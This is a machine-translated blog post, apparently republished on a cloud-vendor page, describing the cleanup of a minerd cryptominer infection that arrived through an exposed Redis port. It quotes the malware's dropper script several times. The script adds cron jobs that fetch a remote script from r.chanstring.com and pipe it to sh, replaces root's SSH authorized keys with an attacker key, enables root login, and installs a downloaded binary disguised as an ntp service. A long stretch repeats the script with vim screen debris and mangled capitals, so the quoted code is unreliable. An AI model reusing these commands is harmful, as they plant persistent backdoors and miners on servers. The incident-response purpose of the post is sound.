Complete cleanup process after minerd in Linux (detailed) _linux

Source: Internet
Author: User
Tags chmod curl mkdir redis ssh

Accidentally installed a Redis service, opened a full network of the default port, the first thought that this server does not have public network IP, the results found regret Mo and AH

One day found that the CPU load is unusually high, found a minerd process accounted for a large number of cpu,google, found himself in the recruit

Here's the cleanup process.

First step

1. Stop Redis Service immediately, modify port permissions, add password measures


2. Delete the two contents of crontab according to the information on the Internet

sudo rm/var/spool/cron/root
sudo rm/var/spool/cron/crontabs/root

3. Enemy, win, study the virus of the initial speech file

Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?070 6 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_confIG echo "Authorizedkeysfile Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd restart "pm.sh" 28L, 1 470C 10,1-8 Top Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl- Fssl http://r.chanstring.com/pm.sh?0706 | SH ">/var/spooll/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM . sh?0706 | SH ">/var/spooll/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtn++94rnitt Shrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wzz 7yEOWW/ QPJEOXLKN40Y5HFLU/XRE4DYBHQV8Q/Z/SDCVHT5FIFN+TKEZ3TXL6NQHTZ405PD3GLWFSJ1A/KVV 9RojF6wL4l3WCRDXu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1yy 993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk755 neoiq echo" perMitrootlogin Yes >>/etc/ssh/sshd_config echo "rsaauthentication yes" >>/etc/ssh/sshd_config echo "P Ubkeyauthentication yes ">>/etc/ssh/sshd_config echo" authorizedkeysfile. Ssh/khk75neoiq >>/etc/ssh/ssh D_config/etc/init.d/sshd Restart 10,1-8 top export path= $PATH:/bin:/usr/bin:/usr/l Ocal/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/rr oot mkdir-p/var/spool/cron/crontabs echo" */10 * * * * CURL-FSSL HTTP://R.CHANSTRING.COM/PM . sh?0706 | SH ">/VAR/SPOOL/CRON/CC rontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 ZHXB3MTN++94RNITSHREWOCC 9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ QPJEOXLL Kn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm88 GSPJTuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbrr O4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/etc/ssh/sshd_conf IG echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "pubkeyauthentication yes" >>/etc/ssh/ss Hd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd restart fi if [!-F "/ETC/INIT.D/NTP"];  Then 10,1-8 top export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/roo ot if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtN++94RNITSHREWOC9HZFS/F/YWW 8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ QPJEOXLKN40Y5HFLU/XRE4DYBHQQ v8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxx mvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "" > ~/.ssh/khk75neoiq echo "permitrootlogin yes" >>/ Etc/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" ;>/etc/ssh/sshd_config echo "Authorizedkeysfile Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/ssh D restart fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt @ 10,1-8 Top export path= $PATH:/bin:/usr/bin:/usr/lo Cal/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spooL/cron/crontabs echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 ZHXB3MTN++94RNITSHREWOC9HZFS/F/YW8KGHYTKVIAK/AA g1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ Qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txll 6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnyy tbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd rest Art fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-f]/etc/Systemd/system/ntp.service "]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 &&

                                                chmod +x/opt/khk77 5neoiq33 &&/opt/khk75neoiq33-install fi fi 10,1-8 Top Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * Curl-fssl Http://r.chanstri ng.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tt drzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ QPJEOXLKN40Y5HFLU/XRE4DYBHQV8Q/Z/SDCVHT5FIFN+TKEZ3TXL6NQHTZ405PD3GLWFSJ1A/KV9ROJF6WW L4l3WCRDXu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpoM+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xbladd y7vrnrvfav Root "> ~/.ssh/KHK75NEOiq echo"  Permitrootlogin Yes >>/etc/ssh/sshd_config echo "rsaauthentication yes" >>/etc/ssh/sshd_config Echo "Pubkeyauthentication yes" >>/etc/ssh/sshd_config echo "authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/ Sshd_config/etc/init.d/sshd restart fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opp t/khk75neoiq33-install fi fi/etc/init.d/ntp start PS auxf|grep-v grep| grep "/usr/bin/cron" |awk ' {print $} ' |xargs kill-9 10,1-8 top ex  Port path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/sPool/cron/root mkdir-p/var/spool/cron/crontabs echo "*/10 * * * Curl-fssl http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyy pLJ53mzb1JpQVj+wZ7yEOWW/ qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ DM8GSPJTUUXXU74ISEYJC4B0H1BWDQBB bxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd rest Art fi if [!-f]/etc/init.d/ntP "]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opt/khk75neoiq33-instaa ll fi fi/etc/init.d/ntp start PS auxf|grep-v grep| 
grep "/usr/bin/cron" |awk ' {print $} ' |xargs kill-9 ps auxf|grep-v grep|grep '/opt/cron ' |awk ' {print $} ' |xargs kill-9 ~ ~ ~ ~ ~ 10,1-8 All export path= $PATH:/bin:/usr/bin:/u Sr/local/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 zhxb3mtn++94rnitshrewoc9hzfs/F/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz77 yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z /sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y999 3qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd rest Art fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opt/khk75neoiq33-install fi fi/etc/init.d/ntp start PS auxf|grep-v grep|gr EP "/usr/bin/cron" |awk ' {print $} ' |xaRGS kill-9 PS auxf|grep-v grep|grep "/opt/cron" |awk ' {print $} ' |xargs kill-9 

Get the results

1. Delete crontab configuration file, as above we have deleted, the code involved

echo "*/10 * * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo" */10 * * * Curl-fssl http://r.chanstring. com/pm.sh?0706 | SH ">/var/spool/cron/crontabs/root

2. Delete This is used for password-free landing

Rm-f ~/.ssh/authorized_keys*
Rm-f ~/.ssh/khk75neoiq

You can even remove the. SSH directory directly.
The code involved

if [!-F "/root/.ssh/khk75neoiq"]; Then
    mkdir-p ~/.ssh
    rm-f ~/.ssh/authorized_keys*
    echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/ 9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+ wZ77
yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y999
3qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq
    echo" Permitrootlogin yes "> >/etc/ssh/sshd_config
    echo "rsaauthentication yes" >>/etc/ssh/sshd_config
    echo " Pubkeyauthentication yes ">>/etc/ssh/sshd_config
    echo" authorizedkeysfile. Ssh/khk75neoiq >>/etc/ Ssh/sshd_config
    /etc/init.d/sshd Restart
fi

3. Delete/opt/This directory This thing is the fourth step of the service generated

4. Delete Service

Service NTP stop
Rm/etc/init.d/ntp
Rm/usr/sbin/ntp
The code involved

if [!-F "/ETC/INIT.D/NTP"]; Then
    if [!-F "/etc/systemd/system/ntp.service"]; then
        mkdir-p/opt Curl-fssl
        V51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opt/khk75neoiq33-install
    fi
fi

As on the code, downloaded a 8M program, is installed what things, the landlord did not know, but the next code exposed whereabouts

/ETC/INIT.D/NTP start

This line of code started NTP this service, Baidu search under said is a time service, in fact, this thing is a virus service, open this file, find the executable file/usr/sbin/ntp found file and that 8m file a byte is not bad

So delete this file

At last

PS Aux|grep Minerd

Kill all the processes, OK fix end

Half an hour later.

PS Aux|grep Minerd

Minerd process no longer appears

The above is a small series for everyone to bring the Linux minerd after the complete cleaning process (detailed) All content, I hope that we support cloud-Habitat Community ~

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.